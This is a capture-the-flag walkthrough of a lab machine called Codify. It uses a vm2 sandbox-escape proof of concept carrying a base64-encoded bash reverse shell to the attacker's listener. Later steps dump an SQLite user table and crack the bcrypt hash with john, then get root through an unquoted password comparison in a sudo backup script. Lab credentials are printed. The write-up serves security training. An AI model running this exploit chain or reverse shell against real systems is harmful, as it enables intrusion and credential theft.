Codify - Walkthroughs

## User Flag ### NMAP Scan ```shell sudo nmap 10.10.11.239 -sV -sC [sudo] password for cwalker: Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-07 13:40 MST Nmap scan report for codify.htb (10.10.11.239) Host is up (0.20s latency). Not shown: 997 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 96:07:1c:c6:77:3e:07:a0:cc:6f:24:19:74:4d:57:0b (ECDSA) |_ 256 0b:a4:c0:cf:e2:3b:95:ae:f6:f5:df:7d:0c:88:d6:ce (ED25519) 80/tcp open http Apache httpd 2.4.52 |_http-title: Codify |_http-server-header: Apache/2.4.52 (Ubuntu) 3000/tcp open http Node.js Express framework |_http-title: Codify Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 18.55 seconds ``` Adding `codify.htb` to /etc/hosts allows me to connect over #HTTP. ### Web Enumeration ![[Pasted image 20231113194648.png]] Clicking on the `Try it now` button takes me to a page where it looks like I can enter something on the right side and see the result on the on the left side. ![[Pasted image 20231113194842.png]] Clicking on `About Us` I find the site allows me to write and test Node.js code. I also see at the bottom of the page that they use vm2, which as described sandboxes the JavaScript. This means that I shouldn't be able to interact with the system that the Node.js tester is actually running on. However, there is a possibility of a vulnerability in this software that we could exploit. ![[Pasted image 20231113195032.png]] ### Proof of Concept But first, I am just going to try a generic node.js reverse shell created on reverse shell generator. I first start my listener. ```shell pwncat -lp 1234 ``` ![[Pasted image 20231113195546.png]] I try to run it, but get an error stating `Error: Module "child_process" is not allowed`. Seeing as this would be too easy, I decide to move onto researching vm2 and see if there are any Proof of Concepts (PoC) or CVE's that I can exploit. After a little googling, I find a [Bleeping Computer article](https://www.bleepingcomputer.com/news/security/new-sandbox-escape-poc-exploit-available-for-vm2-library-patch-now/) that explains the vulnerability and provides a link to a [PoC](https://gist.github.com/leesh3288/381b230b04936dd4d74aaf90cc8bb244). ```node.js const {VM} = require("vm2"); const vm = new VM(); const code = ` err = {}; const handler = { getPrototypeOf(target) { (function stack() { new Error().stack; stack(); })(); } }; const proxiedErr = new Proxy(err, handler); try { throw proxiedErr; } catch ({constructor: c}) { c.constructor('return process')().mainModule.require('child_process').execSync('touch pwned'); } ` console.log(vm.run(code)); ``` ### Exploitation I can see that I should be able to interact with the system by replacing the `touch pwned` with something that would be more useful. I decide to replace this with a #base64 encoded #reverseShell to attempt to connect to my listener. ```shell echo c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMi8xMjM0IDA+JjE= | base64 -d | bash ``` ![[Pasted image 20231113201846.png]] I can see after running the code I am now connected to the target machine as the `svc` user. However, I can see that the user flag is not inside the normal home directory, which means that I need to further escalate to get the flag. ### Foothold Enumeration I upload [[LinPeas]] to the target system and run it to see if there is any valuable output. I notice that part of the output lists a [[SQLite3]] database that I might be able to access. ![[Pasted image 20231116194427.png]] Its located at `/var/www/contact/tickets.db`. I able to enter the database ```shell sqlite3 tickets.db ``` Running the `.tables` It shows two tables inside the database ```sqlite sqlite> .tables tickets users ``` Users looks interesting and selecting all the values shows me a user and a hash. ```sqlite sqlite> select * from users; 3|joshua|$2a$12$SOn8Pf6z8fO/nVsNbAAequ/P6vLRJJl7gCUEiYBU2iLHn4G/p/Zw2 ``` I used john to break the hash and found some new credentials `joshua:spongebob1` ```shell john hash --wordlist=/usr/share/wordlists/rockyou.txt ``` I am able to SSH into the machine and get the user flag in Joshua's home directory. https://security.snyk.io/vuln/SNYK-JS-VM2-5422057 Found vulnerability for Node.js snabox application. Able to execute commands but not reserves shell. https://gist.github.com/leesh3288/f05730165799bf56d70391f3d9ea187c Was able to upload reverse shell and run it to get svc user. Able to access local sqlite3 database and find `joshua:spongebob1`. ssh and got user flag ## Root Flag One of the first things I do when gaining a foothold I usually see if there is anything I can run as sudo. ```shell sudo -l Matching Defaults entries for joshua on codify: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty User joshua may run the following commands on codify: (root) /opt/scripts/mysql-backup.sh ``` I can see that I am able to run a backup script with sudo privledges. ![[Pasted image 20231116200603.png]] However, it is asking for a Roots password. There might be a way to determine the credentials from the script. I also launch [[pspy]] to spy on the commands run when the script is launched. ```shell #!/bin/bash DB_USER="root" DB_PASS=$(/usr/bin/cat /root/.creds) BACKUP_DIR="/var/backups/mysql" read -s -p "Enter MySQL password for $DB_USER: " USER_PASS /usr/bin/echo if [[ $DB_PASS == $USER_PASS ]]; then /usr/bin/echo "Password confirmed!" else /usr/bin/echo "Password confirmation failed!" exit 1 fi /usr/bin/mkdir -p "$BACKUP_DIR" databases=$(/usr/bin/mysql -u "$DB_USER" -h 0.0.0.0 -P 3306 -p"$DB_PASS" -e "SHOW DATABASES;" | /usr/bin/grep -Ev "(Database|information_schema|performance_schema)") for db in $databases; do /usr/bin/echo "Backing up database: $db" /usr/bin/mysqldump --force -u "$DB_USER" -h 0.0.0.0 -P 3306 -p"$DB_PASS" "$db" | /usr/bin/gzip > "$BACKUP_DIR/$db.sql.gz" done /usr/bin/echo "All databases backed up successfully!" /usr/bin/echo "Changing the permissions" /usr/bin/chown root:sys-adm "$BACKUP_DIR" /usr/bin/chmod 774 -R "$BACKUP_DIR" /usr/bin/echo 'Done!' ``` I notice that the script grabs the credentials from a file in roots home folder. It then uses these credentials to run a command with the password in the command line. I notice that when comparing the passwords there are no quotes. In shell scripting this means that we can use wildcard characters in place of letters. When running the script I enter in just a `*` and am able to run the script successfully. ![[Pasted image 20231116201931.png]] I was running [[pspy]] at the same time and see that the script used roots password in plaintext to access the [[MySQL]] database. Meaning the credentials are `root:kljh12k3jhaskjh12kjh3`. ![[Pasted image 20231116202104.png]] I try to escalate on the local machine using `su` and the password found in the script. I am able to escalate to root and get the root flag in the `/root` directory.